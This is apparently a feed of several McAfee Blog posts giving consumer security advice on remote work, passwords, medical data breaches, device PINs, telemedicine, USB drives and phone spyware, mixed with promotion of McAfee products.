Pay attention to your security training and make sure to follow all company cybersecurity rules and use security tools as your IT team intends. For example, if your company requires that everyone use a password manager, a corporate VPN, and multi-factor authentication, do so! And use them correctly every workday!

Secure Home Office, Secure Home

These tips are essential to a secure home office, but they’re also applicable to when you’re off the clock. Password- or passcode-protecting your personal laptop, smartphone, and tablet keeps prying eyes out of your devices, which actually hold more personally identifiable information (PII) than you may think. Password managers, a secure router, VPNs, and safe browsing habits will go a long way toward maintaining your online privacy.

To fill in the cracks to better protect your home devices and your PII, partner with McAfee+. McAfee+ includes a VPN, safe browsing tool, identity monitoring and remediation services, a password manager, and more for a more secure digital life.

In one global survey, 68% of people prefer hybrid work models, and nearly three-quarters of companies allow employees to work from home some of the time.^3,4 The flexibility afforded by hybrid work and 100% work-from-home policies is amazing. Cutting out the time and cost of commuting five days a week is another bonus. Let’s make at-home work a lasting and secure way of professional life!

¹McKinsey Global Institute, “How hybrid work has changed the way people work, live, and shop”

²The Hacker News, “Hackers Breached Colonial Pipeline Using Compromised VPN Password”

³World Economic Forum, “Hybrid working: Why there’s a widening gap between leaders and employees”

⁴International Foundation of Employee Benefit Plans, “Employee Benefits Survey: 2022 Results”

The post The Future of Work: How Technology & the WFH Landscape Are Making an Impact appeared first on McAfee Blog.

Your privacy means everything. And your identity too. The launch of McAfee Privacy & Identity Guard will protect them both. 

We’re proud to announce the launch of McAfee Privacy & Identity Guard in partnership with Staples. Through this partnership, McAfee’s Privacy & Identity Guard will be available at select Staples locations across the U.S. and help customers protect their identity and privacy online. 

McAfee’s Privacy & Identity Guard will be sold in the travel section of Staples along with other travel benefits such as passport services, TSA PreCheck sign up, and fingerprinting services. McAfee’s Privacy & Identity Guard offers a natural fit for Staples customers who are on the go, particularly as they rely on their laptops and smartphones to get things done while traveling.  

And people certainly have concerns about their privacy and identity when they hit the road. McAfee’s recent Safer Summer Report revealed 1 in 3 people have been scammed when booking or taking trips, with a third (34%) of those losing $1,000 or more. This same study found 61% of all adults worry more about digital safety than physical safety when on vacation.  

“As Staples exclusive tech services security partner for the last seven years, we’re excited to partner with Staples on the initial launch of McAfee Privacy & Identity Guard in the U.S.,” said Gagan Singh, McAfee’s Executive Vice President, Chief Operating Officer. “This online protection product was designed to address consumers’ key concerns about safeguarding personal information online, something that becomes even more at risk when traveling.” 

Key McAfee Privacy & Identity Guard features include: 

Identity Monitoring – Monitor personal information with timely alerts. 

• Proactive and Guided – When a breach is detected McAfee can help guide consumers to take the most effective and simple steps when action is needed.  

• Extensive Monitoring – Keep tabs on almost 60 unique pieces of your personal info such as your email address, phone number, Social Security number, credit cards, passport information, and bank accounts, to ensure they are secure. 
• Dedicated Support – McAfee offers friendly 24/7 assistance from security experts available via phone or online. 

Identity Restoration – Exclusive to Staples customers, these features offer further peace of mind in the event of identity theft or loss. 

• Restoration Experts – Identity restoration experts are available 24/7 to help customers take the necessary steps to help repair their identity and credit if they ever need it, including assistance to help prevent or assist with identity fraud of a deceased family member. 

• Lost Wallet Assistance – If a consumer’s ID, credit, or debit cards are lost or stolen, McAfee will help cancel and replace them.  

Privacy Features – Find personal data tied to old, unused online accounts & requests removal of any personal information found on data broker sites.  

• Online Account Cleanup – This feature runs monthly scans to find customers’ online accounts and shows a risk level to help customers decide which to keep or delete.  
• Personal Data Cleanup – Removes personal info from sites that buy and sell it. Staples customers get full-service protection that scans more than 40 high-risk data broker sites and automatically requests removal of any personal information found. 

Is your email on the dark web? 

One sign that your privacy and identity is at risk if your email appears on the dark web. Hackers and scammers post email addresses and other personal and financial information on dark web sites—sometimes offered freely, sometimes offered to other hackers and scammers for sale. You can find out if your email is posted on the dark web by visiting https://www.mcafee.com/idscan-staples. 

The post McAfee’s New Privacy & Identity Guard Launches at Staples Stores appeared first on McAfee Blog.

You’ve been fortunate over the years — no lost phone, no credit card fraud, no computer viruses. Still, deep down, you fear your sloppy digital habits will eventually catch up with you. So, instead of dread and denial, how about a little peace of mind? The perfect time to take a few easy steps and make your digital life your most unhackable is now. Here are seven easy ways to tighten up your digital habits:

1. Two-factor authentication

This small action sounds like a big deal, but it’s easy and important. Two-factor authentication simply puts two layers of security on any personal information channels you frequent. Be it your phone, Facebook, email, or bank account, taking the extra time to implement a two-step password entry, will mean potential crooks will get frustrated and move on to someone else’s information.

McAfee Pro Tip: Go into the account settings of any important account and manually opt for a two-factor authentication account entry. Once set up, the next time you log in to your account, you’ll be prompted to provide the secondary authentication, such as entering a code from your authentication app or confirming a text message code

2. Steer clear of public wifi

It’s convenient and fun to work from the local coffee shop. However, it only takes one nosey, unethical person at that location to access your computer through that shared public network. Snoopers can easily access your passwords, emails, and anything else on your computer. Do your sensitive work at home or in the office on a secure, password-protected network and save your non-wifi workload, such as report reading or writing (sans wifi) for the coffee shop. Avoid doing any banking or private work on public wifi, especially.

McAfee Pro Tip: Check the URL in your browser’s address bar. If it starts with “https” (rather than just “http”), it’s secure and encrypted, ensuring your data is protected during transmission. If it’s only “http,” the site isn’t secure, so avoid proceeding. If using public Wi-Fi, activate your firewall in your security settings to block incoming traffic and enhance protection against potential threats.

3. Don’t be lazy with passwords

According to McAfee’s Digital Asset Study, the most common mistake consumers make is using the same password for all or most online accounts. If this is you, break this poor habit once and for all.

Take this step: Take an hour of your day and change and document your passwords. Once you’ve beefed up your passwords, you can simplify the password process by using True Key multi-factor authentication service for free. A strong password has all of the following characteristics:

• Is at least ten characters in length
• Doesn’t contain any word or words found in the dictionary
• Mixes capital and lower-case letters
• It Contains special characters like numbers, punctuation marks, or symbols.

→ Dig Deeper: 5 Tips For Creating Bulletproof Passwords

4. Declutter your devices

Simplify, simplify, simplify your gadget use, and your safety will improve immediately. With so many digital assets flying at us daily — email, images, files, documents, attachments — it’s easy to get overwhelmed. And, when we are overwhelmed, it’s easy to get sloppy in the places that matter most — like privacy. Focus on your safety and declutter your devices when needed.

To organize:

• Phone: Purge unused apps on your phone and desktop
• Phone: Organize your apps into folders on your home screen. Here’s how to do it on your Android or iPhone.
• Laptop, iPad, tablet: Organize your desktop files into folders and organize your folders by years, i.e., 2014, 2015, 2016. If you have old files, either purge them or archive them in a folder or hard drive that doesn’t visually clutter your desktop.
• Laptop: Clean up your email. This is a very good time to purge old emails, build folders, review and file flagged files, and delete old emails with big attachments that may be using memory on your computer. Need to purge all the spam in your inbox? Unroll.me is a free, fast, easy way to do just that.
• Laptop: Delete unused email accounts, paid subscriptions, and files you no longer use.

5. Target your software

While you sleep, work, or play, hackers tirelessly attempt to infiltrate your computer with malicious software, spyware, and viruses. The lack of anti-virus software on your device is an open invitation to these cyber criminals. Therefore, consider investing in robust antivirus software this year. In addition to this, consider installing filtering software to enhance your social media safety, making it a safer platform for your entire family.

6. Reconsider your sharing habits

Want to take your privacy a notch higher? Consider cutting back on your social sharing. Hackers often create fake social media accounts and use them to monitor your personal data. A determined identity thief on Facebook can gather enough information about you to bypass the security questions on your accounts, potentially gaining access to your financial data. It’s time to rethink your approach to social media. Consider pruning your social circle on platforms like Facebook, Twitter, Instagram, and Snapchat to include only those you know and trust. The lure of high follower numbers is not worth the risk of a potential security breach. Remind your family never to post personal details like your full name, Social Security number, address, phone number, and account numbers on public websites.

To minimize potential damage from oversharing, exercise caution when accepting friend requests or follows from people you don’t know. Also, remember to check your privacy settings. Many platforms allow you to control who sees your posts, profile information, and tagged photos. These features will give you greater control over your online presence.

→ Dig Deeper: Protecting Your Privacy on Social Media

7. Stay updated

Updating software can seem like a chore, especially during a busy workday. However, it’s vital to ensure your digital life remains secure. Cybercriminals always look for outdated software and browsers, preying on the security gaps they exploit. If you frequently use software such as Adobe Flash, Adobe Shockwave, Adobe Acrobat Reader, Java, or browsers like Chrome and Internet Explorer, ensure you’re always running the latest version. By consciously keeping your software updated, you’re erecting yet another line of defense against potential cyber threats.

Furthermore, remember to back up your files regularly. In case of a cyber-attack, a recent backup can save you a lot of trouble and ensure you don’t lose any crucial data.

→ Dig Deeper: Why Software Updates Are So Important

Conclusion

As cybercrimes become increasingly rampant, consider it an ideal opportunity to tighten your digital habits. Investing a little time and effort into securing your digital life can ensure a safer, more protected online experience. Following these simple steps; implementing two-factor authentication, avoiding public wifi, strengthening passwords, decluttering devices, targeting software, reconsidering sharing habits, and staying updated can profoundly impact your digital security. Here’s to a secure and serene digital life with McAfee!

The post 7 Ways to Clean Up Those Sloppy Digital Habits appeared first on McAfee Blog.

As healthcare integrates increasingly digital processes into its operations, the need for robust security measures increases. For many of us, visiting our healthcare provider involves filling out forms that are then transferred into an Electronic Health Record (EHR) system. We put our trust in these healthcare institutions, expecting them to take the necessary steps to store our sensitive data securely. However, with a significant rise in medical data breaches, a whopping 70% increase over the past seven years, it has become more important to understand how these breaches occur and how we can protect ourselves.

Recently, LabCorp, a medical testing company, announced a breach affecting approximately 7.7 million customers, exposing their names, addresses, birth dates, balance, and credit card or bank account information. This breach occurred due to an issue with a third-party billing collections vendor, the American Medical Collection Agency (AMCA). Not long before this, Quest Diagnostics, another company collaborating with AMCA, experienced a similar breach, affecting 11.9 million users.

What makes Medical Data a Target for Cybercriminals?

Medical data is, by nature, nonperishable, making it a highly valuable asset for cybercriminals. This means that while a credit card number or bank account detail can be changed if compromised, medical information remains constant, maintaining its value over time. This also suggests that once procured, this information can be used for various malicious activities, from identity theft to extortion.

Realizing that the healthcare industry is riddled with various security vulnerabilities is crucial. Unencrypted traffic between servers, the ability to create admin accounts remotely, and the disclosure of private information are all shortcomings that these cybercriminals can exploit. With such access, they can permanently alter medical images, use medical research data for extortion, and much more. According to the McAfee Labs Threats Report, the healthcare sector witnessed a 210% increase in publicly disclosed security incidents from 2016 to 2017, resulting from failure to comply with security best practices or address vulnerabilities in medical software.

→ Dig Deeper: How to Safeguard Your Family Against A Medical Data Breach

What can Users do to Protect their Information?

While the onus lies on healthcare institutions to ensure the security of patients’ data, there are several steps that individuals can take on their own to safeguard their privacy. These steps become particularly pivotal if you think your personal or financial information might have been compromised due to recent breaches. In such instances, following certain best practices can significantly enhance your personal data security.

1. Placing a Fraud Alert

One such measure is placing a fraud alert on your credit. This effectively means that any new or recent requests will be scrutinized, making it challenging for fraudulent activities to occur. Additionally, the fraud alert enables you to access extra copies of your credit report, which you can peruse for any suspicious activities.

2. Freezing your Credit and Vigilance

Another effective step you can consider is freezing your credit. Doing so makes it impossible for criminals to take out loans or open new accounts in your name. However, to execute this effectively, remember that credit needs to be frozen at each of the three major credit-reporting agencies – Equifax, TransUnion, and Experian.

Moreover, vigilance plays a critical role in protecting your personal data. Regularly checking your bank account and credit activity can help you spot any anomalies swiftly, allowing you to take immediate action.

McAfee Pro Tip: To lock or to freeze? That is the question. Credit lock only offers limitations in accessing an account. A credit freeze generally has more security features and financial protections guaranteed by law and the three major credit bureaus, so you’ll have more rights and protection if identity theft, fraud, scams, and other cybercrimes occur with a credit freeze compared to a credit lock. Learn more about the difference between credit freeze and credit lock here. 

3. Consider Using Identity Theft Protection Services

Identity theft protection services offer an additional layer of security to protect your personal as well as financial information. They actively monitor your accounts, provide prompt alerts for any suspicious activities, and help you recover losses if things go awry. An identity theft protection service like McAfee Identity Theft Protection can be beneficial. Remember, however, that even with such a service, you should continue practicing other security measures, as they form part of a comprehensive approach to data security.

These services work in the background to ensure constant protection. However, choosing a reputable and reliable identity theft protection service is essential. Do thorough research before committing and compare features such as monitoring services, recovery assistance, and insurance offerings. This step can help protect you not only during medical data breaches but also on other digital platforms where your personal information is stored.

4. Be Vigilant About Checking Your Accounts

If you suspect your personal data has been compromised, you should check your bank account and credit activity frequently. Regular monitoring of your accounts empowers you to stop fraudulent activity. Many banks and credit card companies provide free alerts—through an email or text message—whenever a new purchase is made, an unusual charge is noticed, or your account balance drops to a particular level.

Besides, you should also consider utilizing apps or online services provided by banks and credit companies to keep an eye on your accounts. Such tools can help you track your financial activity conveniently and take instant action if any suspicious activity is spotted. Regularly updating your contact information with banks and credit companies is also important, as it ensures you receive all alerts and updates on time.

→ Dig Deeper: Online Banking—Simple Steps to Protect Yourself from Bank Fraud

Final Thoughts

Increased digitization in the healthcare sector has brought convenience and improved patient services. However, it also presents attractive targets for cybercriminals eager to exploit vulnerabilities for personal gain. Medical data breaches are concerning due to their potential long-term impacts, so it’s critical to protect your personal information proactively.

While healthcare institutions must shoulder the primary responsibility to safeguard patient information, users are far from helpless. By placing a fraud alert, freezing your credit, using identity theft protection services like McAfee Identity Theft Protection, and maintaining vigilance over your financial activity, you can form a comprehensive defense strategy to protect yourself against potential breaches.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blog.

Beyonce sang “if you like it you better put a ring on it” but the same can be said for our personal information on our mobiles. But rather than a ring, the lyric would be “If you like it, you better put a PIN on it.” A PIN, or Personal Identification Number, is your first defense against thieves or hackers who might want to access your private data from your smartphone or tablet.

As we increasingly depend on our digital devices to store and transfer personal data and use the internet for transactions, we are also becoming increasingly vulnerable to digital attacks on our privacy. Having a PIN on your devices is a simple but effective way to add an extra layer of security. Yet, it is reported that half of iPhone users, for instance, don’t use a lock on their devices. In another study, a nationwide survey by Consumer Reports in 2014 found that 30% of people don’t have a PIN or passcode on their smartphones or tablets. This is concerning because by not securing their devices, they are exposing themselves to potential threats of financial fraud, identity theft, and privacy loss.

The Importance of Protecting Your Private Data

Your device and its private data are invaluable resources for any potential hacker or data thief. Yet, we often do not protect our smartphones or tablets, the sensitive information they contain, or our wallets or home computers. Every day should be Data Privacy Day, a time to stress the importance of taking privacy seriously and review your privacy settings and practices.

→ Dig Deeper: What is Data Privacy and How Can I Safeguard It?

By not protecting your mobile devices, you are potentially opening yourself up to financial fraud, identity theft, and overall invasion of your privacy. The data available on your phone, from personal photos and conversations to banking information and private documents, can be a goldmine for any potential attacker. This is why companies like McAfee are announcing new pushes for personal security, such as the “Crack the Pin” initiative. This encourages people to take simple steps toward preserving their privacy by locking, tracking, and encrypting their devices.

Simple Steps to Protect Your Privacy

From fortifying your online accounts with robust passwords to understanding the intricacies of encryption, and from practicing discretion in sharing personal information to recognizing the red flags of phishing attempts, let’s explore a comprehensive set of strategies and practices to help you navigate the digital world with confidence and protect what matters most—your privacy.

• Create Strong, Unique Passwords – It’s essential to emphasize the importance of unique passwords for each online account you have. Using a password manager can help you generate and store complex passwords securely.
• Regularly Change Passwords: Encourage the habit of changing passwords periodically, especially for sensitive accounts like email, online banking, and social media. Consider doing this every three to six months.
• Secure Your Email – Your email account is a gateway to many of your other online accounts. Enable two-factor authentication (2FA) on your email to add an extra layer of security.
• Review App Permissions and Privacy Settings: Take the time to go through the privacy settings of your apps and social media accounts. Limit the data you share and the permissions you grant to apps.
• Be Cautious with Personal Information Sharing: When asked for personal information online or over the phone, ask why it’s needed and how it will be used. Only share what’s necessary and relevant.
• Beware of Public Wi-Fi: Avoid using public Wi-Fi networks for sensitive transactions or logging into important accounts. If necessary, use a VPN to encrypt your internet connection.
• Regular Software Updates: Keep all your devices and software updated with the latest security patches. Cybercriminals often exploit known vulnerabilities.
• Stay Informed: Stay informed about current privacy threats and best practices by following reputable tech news sources and cybersecurity blogs. Knowledge is your best defense.

Securing Your Mobile Devices

One way to ensure the privacy of your mobile devices is through the use of mobile security products. McAfee, for example, has products such as McAfee Mobile Security and McAfee LiveSafe that are designed specifically to protect your devices and the personal data stored on them. These products provide a wide range of security features, from data encryption to anti-theft measures and privacy protection. They can scan apps for potential threats, prevent phishing attacks, and allow you to locate, lock, and wipe your devices in case they get lost or stolen.

→ Dig Deeper: Does My Phone Have a Virus?

Beyond using security products, staying educated on the latest data privacy trends and security measures is also important. This includes keeping your operating system and apps updated, as software updates often contain vital security improvements. Regularly backing up your data is also crucial so that your personal data is not completely lost in the event of a device loss or failure.

The Role of Encryption

Another important aspect of securing your mobile devices is encryption. Encryption is a process that converts your data into an unreadable format that cannot be understood without the correct decryption key. Essentially, even if a hacker or thief manages to access your device, they cannot read your data if it is encrypted. Many smartphones and tablets have encryption options built into the settings, but it’s up to the user to ensure they turn it on and use it correctly.

When it comes to encryption, it’s also crucial to understand the difference between device encryption and app encryption. Device encryption ensures that all data stored on your device is secure, while app encryption secures data within specific apps. While both are important, device encryption is generally considered more comprehensive. However, you should still check the privacy settings in individual apps to ensure your data is protected.

McAfee Pro Tip: When engaging in activities like online banking, shopping, or signing up on a website that requests your personal details, be sure to check for a website address that commences with “https:” rather than just “http:”. This signifies that the site employs encryption for added security. Learn more about encryption here. 

Final Thoughts

In conclusion, securing your mobile devices and their precious personal data should be a top priority. The first step is to put a PIN on your devices and ensure it’s not easily guessable. Other important steps include refraining from sharing your PIN, using security products, staying updated on the latest privacy trends, and employing encryption for comprehensive security. Remember, data privacy is not a one-time event, but a continuous process that requires regular attention and action. So let’s take a page from Beyonce’s book and “put a PIN on it” to keep our private data safe and secure.

The post Put a PIN on It: Securing Your Mobile Devices appeared first on McAfee Blog.

For weeks and even months now, millions of us have relied on the internet in ways we haven’t before. We’ve worked remotely on it, our children have schooled from home on it, and we’ve pushed the limits of our household bandwidth as families have streamed, gamed, and conferenced all at the same time. Something else is new—more and more of us have visited our doctors and healthcare professionals online. Needless to say, this is an entirely new experience for many. And with that, I got to thinking about seniors. What’s been their experience with telemedicine? What concerns have they had? And how can we help?

For starters, an online doctor’s visit is known as telemedicine—a way of diagnosing and treating a medical issue remotely. With telemedicine, care comes from your smartphone or computer via a video conference or a healthcare provider’s portal.

The Rise of Telemedicine

Telemedicine is not new at all. It’s been in use for some time now, such as in rural communities that have little access to local healthcare professionals, in cases of ongoing treatment like heart health monitoring and diabetes care, and in situations where a visit to the doctor’s office simply isn’t practical. What is new is this: telemedicine has made a significant leap in recent months.

A recent global consumer survey by Dynata took a closer look at this trend. The research spanned age groups and nations across North America and Europe, which found that 39% of its respondents consulted a physician or healthcare professional online in the past few months. Of them, two-thirds said they used telemedicine as part of their care. Yet more telling, 84% of those who recently had a telemedicine appointment said this was the first time they used telemedicine.

Satisfaction with Telemedicine Among Seniors

Dynata’s study also looked at their attitudes and experiences with telemedicine based on age and reported that members of the Baby Boomer generation found the experience satisfactory—just over 55%. Interestingly, this was also quite consistent across other age groups, with all hovering just above or below that same level of satisfaction.

Another study gives us insight into how seniors’ opinions about telemedicine may have changed in the past year. We can contrast the findings above with a University of Michigan study that polled American adults aged 50 to 80 in the middle of 2019. On the topic of telemedicine, the research found that:

• 64% would consider using telemedicine if they had an unexpected illness while traveling
• 58% saw it as an option for a return visit or follow-up
• 34% would use it to address a new health concern

Concerns Regarding Telemedicine

The University of Michigan study also asked how older Americans felt about telemedicine visits. At that time in 2019, only 14% said that their provider offered telemedicine visits, while 55% didn’t know if they had the option available to them at all. Just a small number, 4%, said they’d had a telemedicine visit within the year. Needless to say, it’ll be interesting to see what 2020’s results would have to say should the university run this poll again.

In terms of their experience with telemedicine, of those who had at least one telemedicine visit, 58% felt that in-person office visits provided an overall better level of care, and about 55% felt that in-person visits were better for communicating with their healthcare professional and feeling better cared-for overall.

→ Dig Deeper: 6 Tips for a Safer and Easier Telemedicine Visit

Benefits of Telemedicine for Seniors

While it may seem daunting for seniors to navigate the world of telemedicine, there are several advantages to this healthcare approach. One of the main benefits of telemedicine is the elimination of travel time. This can be particularly beneficial for seniors with mobility issues or living in rural areas lacking transportation. As all consultations are conducted virtually, seniors can access healthcare from the comfort of their homes.

Another benefit is the ease of monitoring chronic conditions. Telemedicine allows healthcare providers to closely monitor patients’ symptoms and adjust treatment plans without requiring frequent office visits. This not only saves time but can also lead to better health outcomes. With health trackers and mobile applications, healthcare providers can remotely monitor vitals like blood sugar levels or heart rate, enabling immediate intervention if required.

→ Dig Deeper: How to Make Telehealth Safer for a More Convenient Life Online

Overcoming Technological Barriers

The main barrier to telemedicine for seniors is often technology. A lack of familiarity with the required devices and applications can prove daunting for some. However, with a little help and guidance, this can be overcome. Caregivers, family members, or telemedicine providers can teach seniors how to use the necessary technology. Various user-friendly applications are designed with seniors in mind, simplifying the process.

Providers also often have customer support available to assist with any technological difficulties. It’s essential to remember that the benefits of telemedicine can considerably outweigh the initial learning curve of navigating these new tools. Practice and patience can go a long way in making telemedicine a comfortable and convenient option for seniors.

McAfee Pro Tip: One essential item seniors should have during their visit is a dependable device they are familiar with. This could include a desktop computer, laptop, smartphone, or tablet. Remember that certain telemedicine solutions used by healthcare providers might have specific requirements, so it’s important to check those and ensure their devices are compatible.

Final Thoughts

Telemedicine can benefit seniors, offering more accessible healthcare services and better chronic condition management. While technological may seem challenging, it can be successfully navigated with the right guidance and support. Ultimately, telemedicine is a tool to improve healthcare accessibility and outcomes for seniors, and taking the first steps towards embracing it can lead to better health and comfort.

Improve your telemedicine use with McAfee+, which comes with identity monitoring, unlimited VPN, antivirus, scam protection, data cleanup, and more.

The post Medical Care From Home: Telemedicine and Seniors appeared first on McAfee Blog.

One of the essential aspects of digital security resides in the strength of our passwords. While they are the most convenient and effective way to restrict access to our personal and financial information, the illusion of a fully secure password does not exist. The reality is that we speak in terms of less or more secure passwords. From a practical perspective, we must understand the behind-the-scenes actions that could potentially compromise our passwords and consequently, our digital lives.

Unfortunately, most users frequently overlook this crucial part of their digital existence. They remain largely ignorant of numerous common techniques that hackers employ to crack passwords, leading to the potential loss of personal details, financial information, or even identity theft. Therefore, this blog aims to enlighten readers on how they might be unknowingly making their passwords vulnerable.

Common Techniques for Cracking Passwords

Passwords serve as the first line of defense against unauthorized access to our online accounts, be it email, social media, banking, or other sensitive platforms. However, the unfortunate reality is that not all passwords are created equal, and many individuals and organizations fall victim to password breaches due to weak or compromised credentials. Let’s explore the common techniques for cracking passwords, and learn how to stay one step ahead in the ongoing battle for online security.

Dictionary Attacks

In the world of cyber-attacks, dictionary attacks are common. This approach relies on using software that plugs common words into the password fields in an attempt to break in. It’s an unfortunate fact that free online tools exist to make this task almost effortless for cybercriminals. This method spells doom for passwords that are based on dictionary words, common misspellings, slang terms, or even words spelled backward. Likewise, using consecutive keyboard combinations such as qwerty or asdfg is equally risky. An excellent practice to deflect this attack is to use unique character combinations that make dictionary attacks futile.

Besides text-based passwords, these attacks also target numeric passcodes. When over 32 million passwords were exposed in a breach, nearly 1% of the victims used ‘123456’ as their password. Close on its heels, ‘12345’ was the next most popular choice, followed by similar simple combinations. The best prevention against such attacks is avoiding predictable and simple passwords.

→ Dig Deeper: Cracking Passwords is as Easy as “123”

Cracking Security Questions

While security questions help in password recovery, they also present a potential vulnerability. When you forget your password and click on the ‘Forgot Password’ link, the website generally poses a series of questions to verify your identity. The issue here is that many people use easily traceable personal information such as names of partners, children, other family members, or pets as their answers, some of which can be found on social media profiles with little effort. To sidestep this vulnerability, it’s best not to use easily accessible personal information as the answer to security questions.

McAfee Pro Tip: Exercise caution when sharing content on social media platforms. Avoid making all your personal information publicly accessible to thwart hackers from gathering sensitive details about you. Learn more about the dangers of oversharing on social media here.

Password Reuse Across Multiple Platforms

A common mistake that many internet users make is reusing the same password for multiple accounts. This practice is dangerous as if one data breach compromises your password, the hackers can potentially gain access to other websites using the same login credentials. According to a report published by LastPass in 2022, a recent breach revealed a shocking password reuse rate of 31% among its victims. Hence, using unique passwords for each of your accounts significantly reduces the risk associated with password reuse.

Moreover, it’s also advisable to keep changing your passwords regularly. While this might seem like a hassle, it is a small price to pay for ensuring your digital security. Using a password manager can help you remember and manage different passwords for different websites.

Social Engineering

Social Engineering is a non-technical strategy that cybercriminals use, which relies heavily on human interaction and psychological manipulation to trick people into breaking standard security procedures. They lure their unsuspecting victims into revealing confidential data, especially passwords. Therefore, vigilance and skepticism are invaluable weapons to have in your arsenal to ward off such attacks.

The first step here would be not to divulge your password to anyone, no matter how trustworthy they seem. You should also be wary of unsolicited calls or emails asking for your sensitive information. Remember, legitimate companies will never ask for your password through an email or a phone call.

Methods to Enhance Password Security

Despite the vulnerabilities attached to passwords, much can be done to enhance their security. For starters, creating a strong password is the first line of defense. To achieve this, you need to use a combination of uppercase and lowercase letters, numbers, and symbols. Making the password long, at least 12 to 15 characters, significantly improves its strength. It’s also advisable to avoid using common phrases or strings of common words as passwords- they can be cracked through advanced versions of dictionary attacks.

In addition to creating a strong password, adopting multi-factor authentication can greatly enhance your account security. This technology requires more than one form of evidence to verify your identity. It combines something you know (your password), something you have (like a device), and something you are (like your fingerprint). This makes it more difficult for an attacker to gain access even if they have your password.

→ Dig Deeper: 15 Tips To Better Password Security

Future of Passwords

The future of passwords looks promising. Scientists and tech giants are working relentlessly to develop stronger and more efficient access control tools. Biometrics, dynamic-based biometrics, image-based access, and hardware security tokens are some of the emerging technologies promising to future-proof digital security. With biometrics, users will no longer need to remember complex passwords as access will be based on unique personal features such as fingerprints or facial recognition.

Another promising direction is the use of hardware security tokens, which contain digital certificates to authenticate the user. These tokens can be used in combination with a password to provide two-factor authentication. This makes it more difficult for an attacker to gain access as they would need both your token and your password. While these technologies are still developing, they suggest a future where access control is more secure and user-friendly.

Final thoughts

In conclusion, while there’s no such thing as a perfectly secure password, much can be done to enhance their security. Understanding the common techniques for cracking passwords, such as dictionary attacks and security questions’ exploitation, is the first step towards creating more secure passwords. Using unique complex passwords, combined with multi-factor authentication and software tools like McAfee’s True Key, can greatly improve the security of your accounts.

The future of passwords looks promising with the development of biometrics and hardware security tokens. Until then, it’s crucial to adopt the best password practices available to protect your digital life. Remember, your online security is highly dependent on the strength and uniqueness of your passwords, so keep them complex, unique, and secure.

The post What Makes My Passwords Vulnerable? appeared first on McAfee Blog.

The humble USB drive—the workhorse of students, professionals, and everyday computer users. No wonder hackers put USB drives in their crosshairs. 

Why such a target? All the things that make USB drives attractive to us make them attractive to hackers. They’re inexpensive, portable, and often swap between users. Taken together, that creates the perfect medium for hosting and distributing malware. 

Likewise, USB drives can get lost or stolen quite easily. An absentminded or careless moment could put sensitive information at risk. 

However, that’s not to say you should avoid using USB drives. Not at all. In fact, you can use them securely by taking a few straightforward steps. 

How to protect your USB drive from malware and loss 

Encrypt your USB drive.

Encryption gives you huge peace of mind in the event you lose your USB drive. It prevents others from accessing the data and files on it by scrambling them. Only a person with the password can access them. Windows users can check out this “how to” article on encryption—Apple users can learn about encryption on their support site as well.  

Purchase a USB drive with encryption built in.

If you’d rather skip those steps, you can purchase a USB drive that uses hardware-based encryption built in. These drives cost a little more, yet they more than make up for that in the protection that they offer.  

Keep your USB drive on you.

Physical security is important too. You can prevent loss and theft by toting around your drive in your pocket, bag, or purse. Locking it away in a secure location while you’re not using it stands as a solid option as well. 

Mind your sharing.

You never know what malware might be lurking on someone else’s device. Sharing a USB drive with someone else can help malware make the jump from their device to yours. Think twice before sharing. 

Watch out for USB devices in the wild.

Don’t put it past hackers to load a USB drive with malware in the hopes that someone will pick it up. In fact, several large malware campaigns got their start by mailing “free” USB drives to thousands and thousands of households, businesses, and government agencies. 

Disable AutoPlay.

On Windows computers, you can prevent USB drives from automatically running any files. Some malware will run when the drive gets inserted into the device. Head to Settings > Devices > AutoPlay to disable that feature.  

Deleting isn’t enough—shred your old files.

Deleting a file doesn’t erase data from a drive. It makes space available on a drive, so that old data might still be there—and recoverable. Comprehensive online protection like ours includes a file shredder that will completely erase old data and files. 

Use online protection software.

Malware can easily make its way onto a USB drive. Comprehensive online protection can spot, block, and remove malware before it can do any harm.  

The post USB Drives – Protecting Your Humble Workhorse from Malware and Loss appeared first on McAfee Blog.

It’s a longstanding question: can your phone really take selfies without your knowledge? 

The answer is yes, but with a pretty big asterisk next to it. And that asterisk is known as spyware. Spyware can use your phone for snooping in several ways, including using your camera to take pictures and videos. 

What exactly is spyware? It’s any software or app that steals information from a device and passes it to another party without the victim’s knowledge. And here’s the tricky part—you might have installed it yourself, right from an app store. In other words, you can end up with spyware without a hacker installing it on your phone via a malicious download or link. 

Fortunately, you can avoid spyware rather easily. 

How do phones take pictures and videos without your knowledge? 

First off, it helps to know how spyware can take over your phone’s camera. 

It comes down to permissions. Apps require permissions to do things like access your contacts, photo library, microphone, and camera. For example, a social media app will ask for permission to access your camera if you want to snap a pic and post it online. A messaging app might ask for access to your camera and microphone to send video and voice messages. Likewise, a navigation or rideshare app will ask for permission to access your phone’s location services. Depending on your specific settings, your app might ask for permissions each time you use it, or you might give an app blanket permissions the first time you use it.  

Effectively, permissions make apps go. Yet some apps cross the line. They ask for invasive permissions that they absolutely don’t need to function. A classic example is the glut of old flashlight apps that asked for permission to access things like contact lists and cameras. With those permissions, bad actors stole all manner of personal information. In some cases, they used the phone’s camera and microphone to spy on their victims.  

That old “flashlight app” ruse continues today. You’ll occasionally see reports of spyware cropping up in app stores. This spyware hides in plain sight by masquerading as legitimate apps—like document readers, chat apps, wallpaper apps, and even security software. But these apps are all bogus.  

App stores have anti-spyware measure in place, yet bad apps can still slip through. 

Google Play does its part to keep its virtual shelves free of malware-laden apps with a thorough submission process as reported by Google and through its App Defense Alliance that shares intelligence across a network of partners, of which we’re a proud member. Further, users also have the option of running Play Protect to check apps for safety before they’re downloaded.   

Apple’s App Store has its own rigorous submission process for submitting apps. Likewise, Apple deletes hundreds of thousands of malicious apps from its store each year. 

Yet, bad actors find ways to sneak malware into the store. Sometimes they upload an app that’s initially clean and then push the malware to users as part of an update. Other times, they’ll embed the malicious code so that it only triggers after it’s run in certain countries. They will also encrypt malicious code in the app that they submit, which can make it difficult for reviewers to sniff out.   

Unique to Android phones, Android gives people the option to download apps from third-party app stores. These stores might or might not have a thorough app submission process in place. As a result, they can be far less secure than Google Play. Moreover, some third-party app stores are fronts for organized cybercrime gangs, built specifically to distribute malware, making third-party downloads that much riskier. 

The post Secret Selfies: Can Phones Take Pictures and Videos of You Without Your Knowledge? appeared first on McAfee Blog.

We reported earlier this year, a fresh rash of online job scams continue to rope in plenty of victims. Now, those victims are taking to TikTok with a warning. 

https://www.tiktok.com.mcas.ms/@thenamesamber/video/7188616142062275886

Source, thenamesamber on TikTok 

